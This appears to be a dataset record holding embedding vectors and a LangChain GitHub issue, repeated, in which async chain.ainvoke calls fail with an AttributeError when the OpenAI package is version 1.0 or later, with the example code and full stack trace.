-0.002873597899451852, 0.011785757727921009, 0.004640004597604275, -0.011581801809370518, 0.0006314449128694832, 0.003392593702301383, 0.01933213882148266, 0.010846101678907871, 0.013461112976074219, -0.001830143155530095, 0.022274935618042946, 0.010634861886501312, 0.00449067959561944, -0.004315860103815794, -0.024940935894846916, 0.003875168738886714, -0.012098976410925388, -0.005576018244028091, -0.010168676264584064, -0.00001402056932420237, 0.007043774705380201, -0.02581503428518772, 0.007065627258270979, 0.02457672730088234, 0.025873307138681412, -0.002844461239874363, -0.03758622333407402, -0.0034854665864259005, -0.017001209780573845, -0.009236304089426994, 0.011363277211785316, -0.01603970304131508, 0.014153107069432735, -0.008857528679072857, 0.0030138178262859583, -0.023076193407177925, 0.0012811002088710666, -0.022012706845998764, 0.006053130142390728, 0.00906876940280199, -0.0005563271115534008, 0.023251011967658997, -0.006734198424965143, -0.0019448684761300683, 0.00885024480521679, -0.009374703280627728, -0.00547768222168088, -0.015704631805419922, 0.003729485673829913, -0.008012566715478897, 0.0035637712571769953, -0.01163279078900814, 0.020847242325544357, 0.008340354077517986, 0.0048403190448880196, 0.0074006980285048485, 0.005565091967582703, -0.004097335506230593, 0.0053902724757790565, -0.013759762980043888, 0.0034271935001015663, -0.0025512741412967443, -0.012251943349838257, 0.0050552012398839, 0.005557807628065348, -0.012521456927061081, 0.018254084512591362, -0.0035637712571769953, 0.013249872252345085, -0.006082266569137573, -0.005251873284578323, -0.02122601866722107, 0.006297149229794741, -0.009389271959662437, 0.003691243939101696, -0.002024994231760502, -0.017977286130189896, -0.013249872252345085, -0.0038423901423811913, 0.0016844600904732943, -0.0017618541605770588, 0.004443332552909851, 0.013045916333794594, -0.00896679051220417, 0.004785687662661076, -0.006759692914783955, -0.009549522772431374, 0.007335140835493803, -0.004312217701226473, 0.015631789341568947, 0.0013257156824693084, 0.0017454648623242974, 0.000060777139879064634, 0.003937084227800369, 0.027723481878638268, -0.003805969376116991, 0.023192739114165306, -0.011647358536720276, 0.020016849040985107, -0.005677996203303337, 0.011763905175030231, -0.01724887080490589, 0.007611938752233982, -0.012987642548978329, 0.00899592787027359, 0.01102820597589016, 0.0024857167154550552, 0.015704631805419922, 0.015019920654594898, 0.006140539888292551, -0.0022143821697682142, 0.01418224349617958, -0.0030393123161047697, -0.016593297943472862, 0.010831533931195736, -0.005463114008307457, -0.0050260648131370544, -0.012550593353807926, 0.00400992576032877, -0.0074480450712144375, 0.0007379756425507367, 0.01405112911015749, -0.028772398829460144, -0.0020031416788697243, 0.021590225398540497, 0.0011417907662689686, 0.00142314110416919, 0.017146892845630646, 0.006508389487862587, 0.01065671443939209, -0.01770048961043358, -0.0001714051904855296, -0.01221552211791277, 0.006777903065085411, 0.0010316179832443595, -0.003720380598679185, 0.017613079398870468, 0.020075121894478798, 0.008121829479932785, 0.012353921309113503, -0.018181242048740387, 0.019113615155220032, -0.015937723219394684, 0.011574517004191875, 0.015296719036996365, 0.0202208049595356, 0.0037986852694302797, -0.021473679691553116, -0.0044287643395364285, -0.026077263057231903, 0.009017779491841793, 0.0025203165132552385, -0.01366506889462471, -0.0019120898796245456, -0.0034016987774521112, -0.020162532106041908, -0.003228700254112482, 0.0101104024797678, -0.012346637435257435, 0.008952222764492035, 0.009891877882182598, -0.0018774900818243623, -0.012710845097899437, -0.00815096590667963, 0.0014331568963825703, 0.0030702699441462755, 0.012543309479951859, 0.0002984225866384804, -0.01405112911015749, 0.0008772850269451737, 0.006814323831349611, -0.0004604949790518731, 0.0028772400692105293, -0.027402978390455246, 0.015792042016983032, 0.01858915574848652, -0.006828892510384321, -0.0013184314593672752, -0.011326855979859829, -0.002826250856742263, -0.002360065234825015, 0.003487287787720561, 0.00012587924720719457, 0.003123080125078559, -0.008143682032823563, -0.025203164666891098, 0.003558308118954301, -0.014233232475817204, 0.00137852574698627, -0.011144752614200115, 0.010037560947239399, 0.0067633348517119884, -0.004581731278449297, 0.01034349575638771, -0.0031667849980294704, -0.0057581220753490925, 0.020089691504836082, 0.015515243634581566, 0.008362206630408764, 0.03298263996839523, 0.006286222953349352, -0.009819036349654198, -0.008435048162937164, -0.010496462695300579, 0.002128793392330408, 0.007273225579410791, 0.004264870658516884, 0.006734198424965143, 0.014961647801101208, -0.028976356610655785, 0.00023161325952969491, 0.021779613569378853, -0.02243518829345703, 0.0063954852521419525, 0.010540167801082134, 0.015806609764695168, -0.014327926561236382, 0.020672421902418137, 0.01154538057744503, 0.0218815915286541, 0.040150243788957596, -0.004341354593634605, -0.015005352906882763, 0.0007138468790799379, -0.004902234300971031, 0.0022671923507004976, -0.009345566853880882, -0.00813639722764492, 0.004210239741951227, -0.008813823573291302, 0.015690062195062637, 0.018545450642704964, -0.005379346199333668, 0.00772848492488265, 0.019201023504137993, 0.017831603065133095, -0.01397828757762909, -0.014786828309297562, 0.02443104423582554, 0.005907447077333927, 0.008427763357758522, -0.03053516522049904, -0.012667139992117882, 0.0137233417481184, 0.009003211744129658, -0.004206597805023193, -0.017627647146582603, 0.016535025089979172, -0.005022422876209021, 0.007098406087607145, -0.0005326535901986063, -0.011720200069248676, -0.01627279445528984, 0.003856958355754614, 0.010969932191073895, 0.008988643065094948, 0.006956364959478378, -0.002853566547855735, -0.01621452160179615, -0.005313788540661335, 0.0034745403099805117, -0.022566301748156548, -0.006446474231779575, -0.043442681431770325, 0.005335641093552113, 0.02297421544790268, -0.019288433715701103, -0.004042704124003649, 0.0015670032007619739, -0.0035000350326299667, -0.006060414481908083, -0.0002151101070921868, 0.008551593869924545, -0.00040859539876691997, -0.019973143935203552, -0.00468370970338583, -0.024911798536777496, -0.01153081189841032, -0.0016289184568449855, 0.005266441963613033, -0.012914801016449928, -0.014874237589538097, -0.001214632298797369, 0.020322782918810844, -0.0023072550538927317, 0.005062485579401255, 0.002833534963428974, 0.002680567791685462, 0.00906876940280199, 0.012353921309113503, -0.00898135919123888, -0.02904919721186161, -0.007102048024535179, -0.014029276557266712, 0.0014586513862013817, 0.00464728893712163, 0.001465935492888093, 0.008486037142574787, -0.03554666042327881, 0.006231592036783695, 0.0004766566853504628, 0.010168676264584064, -0.008799255825579166, -0.031817175447940826, 0.0005836426862515509, 0.0010033919243142009, 0.027665209025144577, -0.0016999389044940472, -0.021153176203370094, -0.009411124512553215, 0.004272154998034239, -0.011144752614200115, -0.011108331382274628, 0.010350779630243778, -0.006085908971726894, 0.015792042016983032, -0.011749336495995522, 0.004614510107785463, 0.015107330866158009, 0.016025133430957794, 0.0058382474817335606, 0.024387340992689133, 0.012739981524646282, -0.020585013553500175, 0.010416337288916111, -0.0076774959452450275, 0.01403656043112278, -0.0171905979514122, -0.0036511810030788183, -0.001373973092995584, -0.009921014308929443, 0.023498672991991043, 0.019201023504137993, -0.011975145898759365, -0.010962648317217827, -0.022420618683099747, 0.007546381093561649, -0.012739981524646282, -0.017030347138643265, -0.0189970675855875, 0.013745194301009178, -0.012980358675122261, -0.014772259630262852, 0.01944868452847004, 0.008267512544989586, 0.0020869094878435135, -0.011880451813340187, -0.003248731605708599, 0.007888736203312874, -0.007316930685192347, -0.011261298321187496, 0.013388271443545818, 0.007604654412716627, -0.0008176460396498442, -0.02400856465101242, -0.0011153857922181487, -0.002148824743926525, 0.0008586194016970694, 0.014072981663048267, -0.017627647146582603, 0.011166605167090893, -0.008245659992098808, 0.0075900861993432045, -0.00595843605697155, 0.008660856634378433, -0.0017582121072337031, -0.011130183935165405, -0.0034126250538975, 0.010314359329640865, -0.029413405805826187, 0.013701489195227623, 0.0013193419435992837, -0.0008900322718545794, -0.0055687339045107365, -0.01644761487841606, 0.0014222306199371815, 0.015894019976258278, 0.03580889105796814, 0.007837747223675251, -0.005044274963438511, 0.03639162331819534, 0.00022125610848888755, 0.014488178305327892, 0.005627007223665714, -0.0031303642317652702, 0.005488608498126268, -0.005637933500111103, 0.0031831744126975536, 0.007983430288732052, -0.0029537235386669636, 0.004843960981816053, 0.017656784504652023, 0.004945938941091299, -0.018224947154521942, -0.028918081894516945, -0.006563020870089531, 0.007061985321342945, -0.008347637951374054, 0.0046982779167592525, 0.0025694845244288445, -0.023280149325728416, 0.017438258975744247, 0.00942569226026535, -0.0009860920254141092, -0.0011882272083312273, 0.004443332552909851, 0.011246730573475361, 0.006209739483892918, -0.004854887258261442, -0.015908587723970413, 0.008668140508234501, 0.004071841016411781, 0.011093763634562492, 0.017205165699124336, 0.004953223280608654, 0.002676925854757428, -0.03452688083052635, -0.005095264408737421, -0.009906446561217308, 0.02463500201702118, 0.004749266896396875, -0.007488108240067959, 0.0070801954716444016, 0.016520455479621887, -0.020934652537107468, -0.027257295325398445, 0.01858915574848652, 0.01228836365044117, 0.011749336495995522, 0.0023163603618741035, 0.01353395450860262, -0.0044688270427286625, -0.001230111112818122, 0.01094079576432705, -0.0007725753239355981, -0.008558878675103188, 0.017744194716215134, 0.007480823900550604, -0.009782616049051285, 0.0033525307662785053, 0.010824249126017094, -0.011581801809370518, 0.009877310134470463, -0.009564091451466084, 0.012936653569340706, -0.0015915872063487768, 0.0025367059279233217, 0.008617151528596878, 0.017088619992136955, -0.0025567372795194387, 0.0026150105986744165, -0.006628578063100576, -0.020759832113981247, -0.014102118089795113, -0.019463254138827324, 0.0018246800173074007, 0.02116774581372738, 0.0013339102733880281, 0.009848172776401043, 0.03610025718808174, 0.03773190453648567, 0.02145911194384098, 0.011800325475633144, 0.007823179475963116, 0.0056160809472203255, 0.025975285097956657, -0.005149895325303078, -0.008027135394513607, 0.010809681378304958, -0.014415336772799492, 0.016345636919140816, 0.01974005065858364, 0.00011700169125106186, 0.004414196126163006, -0.0025567372795194387, 0.024285363033413887, 0.012790970504283905, -0.0008681798353791237, -0.010999069549143314, 0.00889394897967577, -0.022508028894662857, 0.013424691744148731, 0.026689132675528526, -0.01730714552104473, 0.01161822210997343, -0.012557878158986568, -0.01138512883335352, 0.03263299912214279, -0.020075121894478798, -0.03041861765086651, -0.010758692398667336, -0.003277868265286088, 0.00247479067184031, -0.03787758946418762, 0.010707703419029713, 0.014262368902564049, -0.01802099123597145, -0.0068580289371311665, -0.03385673835873604, 0.021502817049622536, 0.02480982057750225, 0.0003432656521908939, 0.005561450030654669, 0.02116774581372738, -0.0063007911667227745, -0.008784687146544456, -0.004283081274479628, -0.014058412984013557, -0.012011566199362278, 0.011035489849746227, -0.007539097219705582, -0.002977397060021758, 0.015937723219394684, -0.019186455756425858, -0.0034162672236561775, 0.010030277073383331, 0.03260386362671852, -0.008216523565351963, -0.005124400835484266, -0.009185315109789371, -0.04067470505833626, 0.007830463349819183, 0.00603127758949995, -0.011275867000222206, 0.0053902724757790565, -0.009607796557247639, -0.009804468601942062, -0.02703877165913582, 0.003940726164728403, -0.012550593353807926, 0.019346706569194794, -0.007346067111939192, 0.0063080755062401295, -0.005677996203303337, 0.014102118089795113, 0.011640074662864208, -0.0034545089583843946, -0.013177030719816685, 0.0017600331921130419, -0.004884023685008287, 0.021896161139011383, -0.0152384452521801, -0.012732697650790215, -0.02537798509001732, -0.005688922479748726, -0.0070000700652599335, -0.0014923405833542347, 0.0017700488679111004, 0.01230293232947588, -0.010678566992282867, 0.02961736172437668, -0.026572585105895996, -0.01847260817885399, 0.0005317431059665978, -0.011363277211785316, -0.0021069408394396305, 0.015529811382293701, 0.004989644046872854, 0.012441331520676613, 0.02658715471625328, -0.014830533415079117, 0.019069910049438477, 0.0135048171505332, -0.003915231674909592, 0.019608937203884125, -0.007881452329456806, -0.02243518829345703, -0.0040135676972568035, -0.010613009333610535, -0.00047938825446181, -0.004956865217536688, 0.01442262064665556, 0.0018665639217942953, -0.021692203357815742, 0.013169746845960617, -0.00243836990557611, -0.013257156126201153, 0.009964719414710999, 0.015180172398686409, -0.02291594073176384, 0.009789899922907352, 0.003276047296822071, -0.0022781183943152428, 0.008784687146544456, -0.00017857553029898554, 0.010933511890470982, -0.0009815394878387451, -0.007604654412716627, 0.013439260423183441, -0.0036366127897053957, 0.007568233646452427, -0.00411918805912137, -0.019069910049438477, -0.02320730686187744, 0.0035309926606714725, 0.017467396333813667, -0.005787258502095938, 0.01228836365044117, 0.00532107288017869, 0.013111473061144352, 0.012550593353807926, 0.018414335325360298, -0.014648429118096828, 0.012805539183318615, 0.004636362660676241, 0.004443332552909851, 0.004392343573272228, -0.01246318407356739, -0.0288161039352417, 0.0062534441240131855, -0.01564635895192623, 0.00410461938008666, 0.02973390743136406, 0.0002208008518209681, -0.0016580550000071526, -0.00555052375420928, 0.0004268057818990201, -0.011669211089611053, -0.0033470678608864546, 0.009003211744129658, -0.01985659822821617, 0.05317430943250656, -0.027169886976480484, -0.000913705793209374, 0.0030302072409540415, -0.006774261128157377, -0.0008071750635281205, 0.023221876472234726, -0.015835745260119438, 0.01612711139023304, -0.011902304366230965, -0.016462182626128197, -0.0037276647053658962, -0.003937084227800369, 0.00767021207138896, -0.013344566337764263, 0.0034053409472107887, 0.0038496742490679026, 0.012404910288751125, -0.008901233784854412, -0.025232302024960518, -0.014932511374354362, -0.001237395335920155, -0.010154107585549355, 0.009636932983994484, 0.00017595778626855463, -0.004640004597604275, 0.011239445768296719, 0.01876397430896759, 0.00663222000002861, -0.05795271322131157, -0.0011053700000047684, 0.008500604890286922, 0.021896161139011383, 0.0340898297727108, 0.009338282980024815, -0.014728554524481297, 0.006748766638338566, 0.013453828170895576, -0.013796183280646801, 0.0041082617826759815, 0.00944026093930006, -0.014459040947258472, 0.0055213868618011475, -0.030389482155442238, 0.018035558983683586, -0.005492250435054302, 0.0009915551636368036, -0.005594228394329548, 0.006741482298821211, 0.006639504339545965, -0.012973074801266193, -0.007939725182950497, -0.0017682278994470835, -0.010226949118077755, -0.015617221593856812, -0.0019339423161000013, 0.008114544674754143, -0.017802467569708824, 0.0015888556372374296, -0.011144752614200115, 0.0167535487562418, -0.008391343057155609, -0.003527350490912795, 0.011057342402637005, -0.021735908463597298, -0.00982632115483284, 0.020978357642889023, -0.0069927857257425785, -0.01336641889065504, 0.010999069549143314, -0.013847172260284424, -0.015121899545192719, -0.019725482910871506, -0.0004812092811334878, -0.0009997498709708452, -0.02306162379682064, 0.008311217650771141, -0.01019781269133091, -0.007466255687177181, 0.01727800816297531, 0.0022125612013041973, -0.0016871916595846415, -0.0021834245417267084, -0.023221876472234726, -0.0020286361686885357, -0.005204526241868734, -0.019230160862207413, 0.007801326457411051, -0.0075026764534413815, 0.002928229048848152, 0.01541326567530632, 0.0035036769695580006, 0.002216203138232231, 0.015369560569524765, -0.011377844959497452, -0.006107761058956385, 0.005597870796918869, 0.01055473554879427, 0.011552664451301098, 0.019084477797150612, -0.009746194817125797, 0.017059482634067535, -0.03531356900930405, 0.01730714552104473, 0.01145797036588192, -0.00761922262609005, -0.003354351967573166, -0.022566301748156548, -0.019463254138827324, -0.001955794868990779, -0.007324214559048414, 0.004661857150495052, -0.007983430288732052, -0.017394553869962692, -0.025567373260855675, 0.005233663134276867, 0.005572376307100058, -0.008566162548959255, -0.013810751959681511, 0.005725343246012926, -0.027169886976480484, 0.0004802987677976489, 0.0028772400692105293, -0.008056271821260452, -0.01365050021559, 0.0010944438399747014, 0.015005352906882763, -0.013854457065463066, 0.013686921447515488, 0.020264510065317154, -0.009010495617985725, -0.013453828170895576, 0.007178531493991613, -0.009345566853880882, 0.008493321016430855, 0.009702490642666817, 0.016199953854084015, 0.010897090658545494, 0.0034253722988069057, 0.005408482626080513, -0.013985571451485157, 0.011589085683226585, -0.015704631805419922, 0.0008363116648979485, -0.018239516764879227, -0.005146253388375044, -0.001322073512710631, -0.02555280365049839, -0.02486809343099594, -0.019040772691369057, 0.022391483187675476, 0.0074480450712144375, 0.019186455756425858, -0.02326558157801628, -0.012281079776585102, 0.015558947809040546, 0.007815894670784473, 0.004443332552909851, 0.01034349575638771, 0.015544380061328411, -0.004712846130132675, 0.010511031374335289, 0.004020851571112871, -0.02641233429312706, 0.010598440654575825, 0.0021032989025115967, 0.029384268447756767, -0.00898135919123888, 0.006319001782685518, -0.009556807577610016, 0.014764975756406784, -0.009520386345684528, -0.002296328777447343, 0.0071748895570635796, 0.045161742717027664, -0.001580660929903388, 0.002427443629130721, -0.014233232475817204, -0.003277868265286088, 0.006410053465515375, 0.011108331382274628, -0.013686921447515488, -0.0289617870002985, 0.01799185574054718, 0.005189958028495312, 0.016433047130703926, -0.02131342887878418, -0.021867023780941963, 0.01730714552104473, -0.010518315248191357, -0.014757691882550716, -0.007327856495976448, 0.012324784882366657, 0.012251943349838257, -0.006701419595628977, -0.007444403134286404, 0.022653711959719658, 0.0022416976280510426, 0.0085952989757061, 0.002083267318084836, 0.00284628220833838, -0.01070041861385107, 0.010066697373986244, 0.00936741940677166 ]
null
null
null
null
null
null
null
null
null
[ "hwchase17", "langchain" ]
### Checked other resources - [X] I added a very descriptive title to this issue. - [X] I searched the LangChain documentation with the integrated search. - [X] I used the GitHub search to find a similar question and didn't find it. - [X] I am sure that this is a bug in LangChain rather than my code. - [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package). ### Example Code ``` from langchain_core.prompts import ChatPromptTemplate from langchain.llms import OpenAI from langchain.schema.output_parser import StrOutputParser model = OpenAI(model_name='gpt-4o') prompt = ChatPromptTemplate.from_template('tell me a joke: {question}') question = "a funny one" async def get_question(query): return 'tell me a joke' chain = ( { "question": get_question, } | prompt | model | StrOutputParser() ) # Define a function to invoke the chain async def invoke_chain(question): result = await chain.ainvoke(question) return result # Example usage # Run the async function and get the result result = await invoke_chain(question) print(result) ``` ### Error Message and Stack Trace (if applicable) ``` ---> 32 result = await invoke_chain(question) 33 print(result) Cell In[13], line 25, in invoke_chain(question) 24 async def invoke_chain(question): ---> 25 result = await chain.ainvoke(question) 26 return result File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/runnables/base.py:2436, in RunnableSequence.ainvoke(self, input, config, **kwargs) 2434 try: 2435 for i, step in enumerate(self.steps): -> 2436 input = await step.ainvoke( 2437 input, 2438 # mark each step as a child run 2439 patch_config( 2440 config, callbacks=run_manager.get_child(f"seq:step:{i+1}") 2441 ), 2442 ) 2443 # finish the root run 2444 except BaseException as e: File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:299, in BaseLLM.ainvoke(self, input, config, stop, **kwargs) 290 async def ainvoke( 291 self, 292 input: LanguageModelInput, (...) 296 **kwargs: Any, 297 ) -> str: 298 config = ensure_config(config) --> 299 llm_result = await self.agenerate_prompt( 300 [self._convert_input(input)], 301 stop=stop, 302 callbacks=config.get("callbacks"), 303 tags=config.get("tags"), 304 metadata=config.get("metadata"), 305 run_name=config.get("run_name"), 306 run_id=config.pop("run_id", None), 307 **kwargs, 308 ) 309 return llm_result.generations[0][0].text File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:643, in BaseLLM.agenerate_prompt(self, prompts, stop, callbacks, **kwargs) 635 async def agenerate_prompt( 636 self, 637 prompts: List[PromptValue], (...) 640 **kwargs: Any, 641 ) -> LLMResult: 642 prompt_strings = [p.to_string() for p in prompts] --> 643 return await self.agenerate( 644 prompt_strings, stop=stop, callbacks=callbacks, **kwargs 645 ) File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:1018, in BaseLLM.agenerate(self, prompts, stop, callbacks, tags, metadata, run_name, run_id, **kwargs) 1001 run_managers = await asyncio.gather( 1002 *[ 1003 callback_manager.on_llm_start( (...) 1015 ] 1016 ) 1017 run_managers = [r[0] for r in run_managers] # type: ignore[misc] -> 1018 output = await self._agenerate_helper( 1019 prompts, 1020 stop, 1021 run_managers, # type: ignore[arg-type] 1022 bool(new_arg_supported), 1023 **kwargs, # type: ignore[arg-type] 1024 ) 1025 return output 1026 if len(missing_prompts) > 0: File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:882, in BaseLLM._agenerate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 875 except BaseException as e: 876 await asyncio.gather( 877 *[ 878 run_manager.on_llm_error(e, response=LLMResult(generations=[])) 879 for run_manager in run_managers 880 ] 881 ) --> 882 raise e 883 flattened_outputs = output.flatten() 884 await asyncio.gather( 885 *[ 886 run_manager.on_llm_end(flattened_output) (...) 890 ] 891 ) File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:866, in BaseLLM._agenerate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 856 async def _agenerate_helper( 857 self, 858 prompts: List[str], (...) 862 **kwargs: Any, 863 ) -> LLMResult: 864 try: 865 output = ( --> 866 await self._agenerate( 867 prompts, 868 stop=stop, 869 run_manager=run_managers[0] if run_managers else None, 870 **kwargs, 871 ) 872 if new_arg_supported 873 else await self._agenerate(prompts, stop=stop) 874 ) 875 except BaseException as e: 876 await asyncio.gather( 877 *[ 878 run_manager.on_llm_error(e, response=LLMResult(generations=[])) 879 for run_manager in run_managers 880 ] 881 ) File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_community/llms/openai.py:1194, in OpenAIChat._agenerate(self, prompts, stop, run_manager, **kwargs) 1192 messages, params = self._get_chat_params(prompts, stop) 1193 params = {**params, **kwargs} -> 1194 full_response = await acompletion_with_retry( 1195 self, messages=messages, run_manager=run_manager, **params 1196 ) 1197 if not isinstance(full_response, dict): 1198 full_response = full_response.dict() File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_community/llms/openai.py:133, in acompletion_with_retry(llm, run_manager, **kwargs) 131 """Use tenacity to retry the async completion call.""" 132 if is_openai_v1(): --> 133 return await llm.async_client.create(**kwargs) 135 retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) 137 @retry_decorator 138 async def _completion_with_retry(**kwargs: Any) -> Any: 139 # Use OpenAI's async api https://github.com/openai/openai-python#async-api AttributeError: 'NoneType' object has no attribute 'create' ``` ### Description Doing async calls to langchain seem to break when I update OpenAI package to version >=1.0 ### System Info latest version from github or any other version is affected
Langchain using chain.ainvoke for async breaks with OpenAI>=1.0: AttributeError: 'NoneType' object has no attribute 'create
https://api.github.com/repos/langchain-ai/langchain/issues/22338/comments
3
2024-05-31T01:10:43
2024-05-31T12:51:33Z
https://github.com/langchain-ai/langchain/issues/22338
2,326,789,269
22,338
false
This is a GitHub Issue repo:langchain owner:hwchase17 Title : Langchain using chain.ainvoke for async breaks with OpenAI>=1.0: AttributeError: 'NoneType' object has no attribute 'create Issue date: --- start body --- ### Checked other resources - [X] I added a very descriptive title to this issue. - [X] I searched the LangChain documentation with the integrated search. - [X] I used the GitHub search to find a similar question and didn't find it. - [X] I am sure that this is a bug in LangChain rather than my code. - [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package). ### Example Code ``` from langchain_core.prompts import ChatPromptTemplate from langchain.llms import OpenAI from langchain.schema.output_parser import StrOutputParser model = OpenAI(model_name='gpt-4o') prompt = ChatPromptTemplate.from_template('tell me a joke: {question}') question = "a funny one" async def get_question(query): return 'tell me a joke' chain = ( { "question": get_question, } | prompt | model | StrOutputParser() ) # Define a function to invoke the chain async def invoke_chain(question): result = await chain.ainvoke(question) return result # Example usage # Run the async function and get the result result = await invoke_chain(question) print(result) ``` ### Error Message and Stack Trace (if applicable) ``` ---> 32 result = await invoke_chain(question) 33 print(result) Cell In[13], line 25, in invoke_chain(question) 24 async def invoke_chain(question): ---> 25 result = await chain.ainvoke(question) 26 return result File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/runnables/base.py:2436, in RunnableSequence.ainvoke(self, input, config, **kwargs) 2434 try: 2435 for i, step in enumerate(self.steps): -> 2436 input = await step.ainvoke( 2437 input, 2438 # mark each step as a child run 2439 patch_config( 2440 config, callbacks=run_manager.get_child(f"seq:step:{i+1}") 2441 ), 2442 ) 2443 # finish the root run 2444 except BaseException as e: File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:299, in BaseLLM.ainvoke(self, input, config, stop, **kwargs) 290 async def ainvoke( 291 self, 292 input: LanguageModelInput, (...) 296 **kwargs: Any, 297 ) -> str: 298 config = ensure_config(config) --> 299 llm_result = await self.agenerate_prompt( 300 [self._convert_input(input)], 301 stop=stop, 302 callbacks=config.get("callbacks"), 303 tags=config.get("tags"), 304 metadata=config.get("metadata"), 305 run_name=config.get("run_name"), 306 run_id=config.pop("run_id", None), 307 **kwargs, 308 ) 309 return llm_result.generations[0][0].text File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:643, in BaseLLM.agenerate_prompt(self, prompts, stop, callbacks, **kwargs) 635 async def agenerate_prompt( 636 self, 637 prompts: List[PromptValue], (...) 640 **kwargs: Any, 641 ) -> LLMResult: 642 prompt_strings = [p.to_string() for p in prompts] --> 643 return await self.agenerate( 644 prompt_strings, stop=stop, callbacks=callbacks, **kwargs 645 ) File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:1018, in BaseLLM.agenerate(self, prompts, stop, callbacks, tags, metadata, run_name, run_id, **kwargs) 1001 run_managers = await asyncio.gather( 1002 *[ 1003 callback_manager.on_llm_start( (...) 1015 ] 1016 ) 1017 run_managers = [r[0] for r in run_managers] # type: ignore[misc] -> 1018 output = await self._agenerate_helper( 1019 prompts, 1020 stop, 1021 run_managers, # type: ignore[arg-type] 1022 bool(new_arg_supported), 1023 **kwargs, # type: ignore[arg-type] 1024 ) 1025 return output 1026 if len(missing_prompts) > 0: File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:882, in BaseLLM._agenerate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 875 except BaseException as e: 876 await asyncio.gather( 877 *[ 878 run_manager.on_llm_error(e, response=LLMResult(generations=[])) 879 for run_manager in run_managers 880 ] 881 ) --> 882 raise e 883 flattened_outputs = output.flatten() 884 await asyncio.gather( 885 *[ 886 run_manager.on_llm_end(flattened_output) (...) 890 ] 891 ) File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_core/language_models/llms.py:866, in BaseLLM._agenerate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 856 async def _agenerate_helper( 857 self, 858 prompts: List[str], (...) 862 **kwargs: Any, 863 ) -> LLMResult: 864 try: 865 output = ( --> 866 await self._agenerate( 867 prompts, 868 stop=stop, 869 run_manager=run_managers[0] if run_managers else None, 870 **kwargs, 871 ) 872 if new_arg_supported 873 else await self._agenerate(prompts, stop=stop) 874 ) 875 except BaseException as e: 876 await asyncio.gather( 877 *[ 878 run_manager.on_llm_error(e, response=LLMResult(generations=[])) 879 for run_manager in run_managers 880 ] 881 ) File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_community/llms/openai.py:1194, in OpenAIChat._agenerate(self, prompts, stop, run_manager, **kwargs) 1192 messages, params = self._get_chat_params(prompts, stop) 1193 params = {**params, **kwargs} -> 1194 full_response = await acompletion_with_retry( 1195 self, messages=messages, run_manager=run_manager, **params 1196 ) 1197 if not isinstance(full_response, dict): 1198 full_response = full_response.dict() File ~/dev/sparkai-chatbot/venv/lib/python3.11/site-packages/langchain_community/llms/openai.py:133, in acompletion_with_retry(llm, run_manager, **kwargs) 131 """Use tenacity to retry the async completion call.""" 132 if is_openai_v1(): --> 133 return await llm.async_client.create(**kwargs) 135 retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) 137 @retry_decorator 138 async def _completion_with_retry(**kwargs: Any) -> Any: 139 # Use OpenAI's async api https://github.com/openai/openai-python#async-api AttributeError: 'NoneType' object has no attribute 'create' ``` ### Description Doing async calls to langchain seem to break when I update OpenAI package to version >=1.0 ### System Info latest version from github or any other version is affected --- end body ---
7,561
[ -0.0319715216755867, -0.011693057604134083, -0.010723470710217953, 0.039744794368743896, -0.004744348581880331, -0.046971119940280914, 0.016971921548247337, 0.024397138506174088, 0.02358500473201275, 0.043788883835077286, 0.007396211382001638, 0.030927350744605064, -0.028408080339431763, -0.000034054683055728674, 0.021165180951356888, 0.03164003789424896, -0.04242980480194092, 0.030861053615808487, 0.0005743976216763258, -0.03812052682042122, -0.0007391031831502914, -0.010557728819549084, -0.022839168086647987, 0.017750907689332962, 0.0152067756280303, 0.005664213094860315, -0.0002970397181343287, 0.015148766338825226, -0.038518309593200684, -0.020634807646274567, -0.01901054196059704, -0.01657414250075817, 0.009389251470565796, 0.048960018903017044, 0.05297096073627472, -0.0244302861392498, 0.03164003789424896, 0.031623464077711105, -0.02665122225880623, 0.008125473745167255, -0.03321458399295807, -0.011411297135055065, -0.01248861663043499, 0.0006805757293477654, -0.016010621562600136, -0.010673748329281807, -0.010400274768471718, 0.021132031455636024, -0.03284995257854462, 0.030479848384857178, 0.00562692154198885, -0.0500539131462574, 0.0234689861536026, -0.04365629330277443, 0.028888730332255363, -0.018977394327521324, 0.008626841008663177, -0.03212068974971771, 0.023601578548550606, -0.0018159045139327645, 0.013101859949529171, 0.045181114226579666, -0.0074873692356050014, 0.01434492040425539, 0.0008903422276489437, 0.013499638997018337, -0.02627001702785492, 0.03349634259939194, 0.015687426552176476, -0.016499558463692665, 0.005722222849726677, -0.006907274015247822, -0.02986660599708557, 0.010640599764883518, 0.03719237819314003, -0.005374165717512369, -0.0117344930768013, 0.03556811064481735, -0.02708214893937111, -0.00909920409321785, -0.012803525663912296, -0.005448749288916588, -0.011941669508814812, -0.01566256582736969, 0.01884480006992817, 0.04130276292562485, -0.001891524065285921, -0.059998396784067154, -0.013930566608905792, -0.015637703239917755, -0.009480409324169159, 0.03798793628811836, -0.01084777619689703, -0.010408561676740646, -0.028192616999149323, -0.013391907326877117, 0.00017881946405395865, 